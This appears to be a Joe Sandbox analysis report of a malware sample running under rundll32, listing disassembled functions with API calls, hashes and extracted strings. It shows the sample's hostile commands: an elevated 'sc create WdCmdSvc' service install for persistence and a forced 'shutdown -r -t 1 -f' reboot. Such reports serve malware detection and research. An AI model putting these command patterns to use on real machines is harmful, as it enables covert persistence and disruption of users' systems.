                              • API String ID: 3472027048-0
                              • Opcode ID: 0f2de930d994b4e7f51ac4db36611e8c3cc787febba4341b996f4f811a176ad6
                              • Instruction ID: ab8ca698554bb0b7d14378d795ad57c9a02d59467f5a954e4c0636b30b61b63c
                              • Opcode Fuzzy Hash: 0f2de930d994b4e7f51ac4db36611e8c3cc787febba4341b996f4f811a176ad6
                              • Instruction Fuzzy Hash: F771F276A453018FD715CF28D98871ABBE5EF86314F1882AADE4C8F3A1D7B48845C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCapture.USER32 ref: 041E7752
                              • IsWindowUnicode.USER32(00000000), ref: 041E7795
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 041E77B0
                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 041E77CF
                              • GetWindowThreadProcessId.USER32(00000000), ref: 041E77DE
                              • GetWindowThreadProcessId.USER32(?,?), ref: 041E77EF
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 041E780F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                              • String ID:
                              • API String ID: 1994056952-0
                              • Opcode ID: acee4a938bd02a54410868a0c46c4f6779eb5ef3b886609ee496b38d5591f89b
                              • Instruction ID: addaed89e3a7daed5e90c942ca4e0ba6ad52adce1b7b5004648722843b971a6a
                              • Opcode Fuzzy Hash: acee4a938bd02a54410868a0c46c4f6779eb5ef3b886609ee496b38d5591f89b
                              • Instruction Fuzzy Hash: D3217A79204A09AFF760EE5ADDC0FB7B3DCDF14218F148868E969D3281EB11F8118761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3a104c5c7c0968dca55300616b33de5ab1b0765a80f8ac4fc635f163f9d63036
                              • Instruction ID: c2374d9588b99e847261936b47671d76693d5123c1e1deaa78b8e28b2f71f6da
                              • Opcode Fuzzy Hash: 3a104c5c7c0968dca55300616b33de5ab1b0765a80f8ac4fc635f163f9d63036
                              • Instruction Fuzzy Hash: E7C11566B107010FD728EA7CDC8876EB696DFC6621F1C8279EB58CF3B5DA68C8458350
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 03FF9DB8: GetCurrentThreadId.KERNEL32 ref: 03FF9DBB
                              • GetTickCount.KERNEL32 ref: 03FF9963
                              • GetTickCount.KERNEL32 ref: 03FF997B
                              • GetCurrentThreadId.KERNEL32 ref: 03FF99AA
                              • GetTickCount.KERNEL32 ref: 03FF99D5
                              • GetTickCount.KERNEL32 ref: 03FF9A0C
                              • GetTickCount.KERNEL32 ref: 03FF9A36
                              • GetCurrentThreadId.KERNEL32 ref: 03FF9AA6
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$CurrentThread
                              • String ID:
                              • API String ID: 3968769311-0
                              • Opcode ID: 3244b679cc34e79b713aed37fcabf7a26e5a4cea97780924c13619874c34caac
                              • Instruction ID: 046f80b5962796cc8249b8d97d63f862b47e03053cf9e4d59b61f190263f5273
                              • Opcode Fuzzy Hash: 3244b679cc34e79b713aed37fcabf7a26e5a4cea97780924c13619874c34caac
                              • Instruction Fuzzy Hash: EF4163316083429ED731EE7CC88435FBBD5AF82254F198A6DDED88B261E7B5D4808752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ShellExecuteExW.SHELL32(?), ref: 0422CF42
                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,0422CFB0,?,00000000,0422CFD5,?,?,?,?), ref: 0422CF51
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0422CF73
                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0422CF85
                              • CloseHandle.KERNEL32(?,00000001,?,00000000,000000FF,000004FF,00000001,?,00000000,000000FF,000004FF,?,000000FF,00000000,0422CFB0), ref: 0422CF95
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Wait$CloseCodeExecuteExitHandleMultipleObjectObjectsProcessShellSingle
                              • String ID: runas
                              • API String ID: 1089270204-4000483414
                              • Opcode ID: a8605d75556cedcaae7a5b20ff5520244c9db5c8efbf3a53f834496adf11502d
                              • Instruction ID: cdc6211e3eab9ed848c58ce41e0801883086ea6dca7f35aa503df875d32d993a
                              • Opcode Fuzzy Hash: a8605d75556cedcaae7a5b20ff5520244c9db5c8efbf3a53f834496adf11502d
                              • Instruction Fuzzy Hash: 7C315C74A14204AFEB11EF69C980A9EB7F8FF48304F508566E905EB294DB74E901CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,042408A8,00000000,?,03FFAA6A,?,?,0424CB9C,0424CB9C,?,?,04241C38,04001A03,042408A8), ref: 03FFA9E5
                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,042408A8,00000000,?,03FFAA6A,?,?,0424CB9C,0424CB9C,?,?,04241C38,04001A03), ref: 03FFA9EB
                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,042408A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,042408A8,00000000,?,03FFAA6A,?,?,0424CB9C), ref: 03FFAA06
                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,042408A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,042408A8,00000000,?,03FFAA6A,?,?), ref: 03FFAA0C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID: Error$Runtime error at 00000000
                              • API String ID: 3320372497-2970929446
                              • Opcode ID: bf0a768f11c0c8f97749dfcb684450a7794b1cce05dcf695ed5df1abd9828f9c
                              • Instruction ID: 7122f0c38578a863d802771a37011954e09467b0f68c933e3e8c79f112dbfe6b
                              • Opcode Fuzzy Hash: bf0a768f11c0c8f97749dfcb684450a7794b1cce05dcf695ed5df1abd9828f9c
                              • Instruction Fuzzy Hash: 51F0C8687D4345BEFA20E7585C0EF693A5CDF82B10F540205FF585D0E8E6A858C85B21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 03FF629A
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 03FF62A0
                              • GetStdHandle.KERNEL32(000000F4,03FF53E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 03FF62BF
                              • WriteFile.KERNEL32(00000000,000000F4,03FF53E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 03FF62C5
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,03FF53E8,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 03FF62DC
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,03FF53E8,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 03FF62E2
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID:
                              • API String ID: 3320372497-0
                              • Opcode ID: 2e32fcf3eb0a828995b782e262adb1cacda06ea1ab63f562a1ba890b73655cd0
                              • Instruction ID: 205e5060ae18ec24893c2b1f35d1ea8f90052c152376b4eed082102a27910d16
                              • Opcode Fuzzy Hash: 2e32fcf3eb0a828995b782e262adb1cacda06ea1ab63f562a1ba890b73655cd0
                              • Instruction Fuzzy Hash: 8801319D6547153EE610F2BC9C88F6F3A8CDF56660F200625BB1CDA0F2C954CC4482B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000), ref: 03FF5A67
                              • Sleep.KERNEL32(0000000A,00000000), ref: 03FF5A7D
                              • Sleep.KERNEL32(00000000), ref: 03FF5AAB
                              • Sleep.KERNEL32(0000000A,00000000), ref: 03FF5AC1
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: deabb139d00971b358844ffe31cf25b236f19d2f6498f0050917a2b766e11046
                              • Instruction ID: 23aa61bbb67b1313188a0f231b6f0166b69b52657214baa3d51dea62defd69ea
                              • Opcode Fuzzy Hash: deabb139d00971b358844ffe31cf25b236f19d2f6498f0050917a2b766e11046
                              • Instruction Fuzzy Hash: ABC13976A017528FC719CF6CE988315BBA1FF86310F0982ADDA4A8F3E4D3B49855C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0423221C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas
                              • API String ID: 587946157-3037528773
                              • Opcode ID: e3885d632949a6bc51d8c2b60f72409f19470cc97998ac397894558433745c39
                              • Instruction ID: ebfb93c87a34d1d26cf3a39bdef18891f44e9913efc717bbbebbe066b567e17e
                              • Opcode Fuzzy Hash: e3885d632949a6bc51d8c2b60f72409f19470cc97998ac397894558433745c39
                              • Instruction Fuzzy Hash: 31F0C2B4754304FFEB01EBA4CC42F4DBBB8EF44B11FA044B5BA04A2AA0DA707A009D24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(041E64D4,00000000), ref: 041E661E
                              • ShowWindow.USER32(?,00000000,041E64D4,00000000), ref: 041E6660
                              • ShowOwnedPopups.USER32(00000000,?), ref: 041E668F
                              • ShowWindow.USER32(?,00000005), ref: 041E6704
                              • ShowOwnedPopups.USER32(00000000,?), ref: 041E6733
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                              • String ID:
                              • API String ID: 315437064-0
                              • Opcode ID: fba478a7369092fe8f7c53b7066074d06dd8e2abb14a8e703fb71d5838679c49
                              • Instruction ID: 35de69b02cd7ec32659d53a7340743434671fc78738f0be52d139dc2575553ca
                              • Opcode Fuzzy Hash: fba478a7369092fe8f7c53b7066074d06dd8e2abb14a8e703fb71d5838679c49
                              • Instruction Fuzzy Hash: D4412139610B418FE720DB29C8C4BBA73E6EB54358F854965D46597291C734BC81DB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,04233D3A,04233E04,00000000,04233E2C,?,?,00000000,00000000,?,?,04235E55), ref: 040168C8
                              • GetLastError.KERNEL32(00000000,?,?,?,?,04233D3A,04233E04,00000000,04233E2C,?,?,00000000,00000000,?,?,04235E55), ref: 040168D7
                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,04233D3A,04233E04,00000000,04233E2C,?,?,00000000,00000000,?), ref: 040168DF
                              • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,04233D3A,04233E04,00000000,04233E2C,?,?,00000000,00000000,?), ref: 040168FA
                              • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,?,?,04233D3A,04233E04,00000000,04233E2C,?,?,00000000,00000000,?), ref: 04016908
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                              • String ID:
                              • API String ID: 2814369299-0
                              • Opcode ID: 9b7ef98bdcdfc04959bc34be0926f2be6abfb9d61081f11479c35cf3ac9964d4
                              • Instruction ID: d4c2d172af8349fc2c21cb0654142390d49059a57a5558e3b890bafbc25a6ffe
                              • Opcode Fuzzy Hash: 9b7ef98bdcdfc04959bc34be0926f2be6abfb9d61081f11479c35cf3ac9964d4
                              • Instruction Fuzzy Hash: E7F030522412981BBE607A7C5C84ABE11CDDB8266DF184E31FE50F61F1D917781AC261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • UnhookWindowsHookEx.USER32(00000000), ref: 041E56E6
                              • SetEvent.KERNEL32(00000000), ref: 041E5712
                              • GetCurrentThreadId.KERNEL32 ref: 041E5717
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 041E5740
                              • CloseHandle.KERNEL32(00000000,00000000), ref: 041E574D
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                              • String ID:
                              • API String ID: 2132507429-0
                              • Opcode ID: 6c46721c5a327809059b405e6d8b852274abf2e9a9948606bd197ad9ad70f9a7
                              • Instruction ID: 6ec2a3a0c49578e27cc8e31e9f7867f6566990cacb25d6f8ea3fe875179d7c89
                              • Opcode Fuzzy Hash: 6c46721c5a327809059b405e6d8b852274abf2e9a9948606bd197ad9ad70f9a7
                              • Instruction Fuzzy Hash: 2C018F74A44701AEF304FFA9ED84B6A33E9EB4431CF00C925A464D71D0DB35B850DB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00002328,00000000,04235927,?,?,04233DEF,.exe,04235E82,0000012C,0000001E,04233E04,00000000,04233E2C,?,?,00000000), ref: 042358FE
                              • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0423590A
                              • Sleep.KERNEL32(0000012C,00002328,00000000,04235927,?,?,04233DEF,.exe,04235E82,0000012C,0000001E,04233E04,00000000,04233E2C,?,?), ref: 04235914
                              Strings
                              • C:\WINDOWS\system32\shutdown.exe -r -t 1 -f, xrefs: 04235905
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep$Exec
                              • String ID: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
                              • API String ID: 1325486322-941748481
                              • Opcode ID: c66a629ae7f826558553e15b56516e264a872502fc01bc88fdd4db5682d9bbac
                              • Instruction ID: 3757ac125cd7bef1ae8b96e32e2db4b7a76f935b60606b4bc2f7e1b5aaf16c68
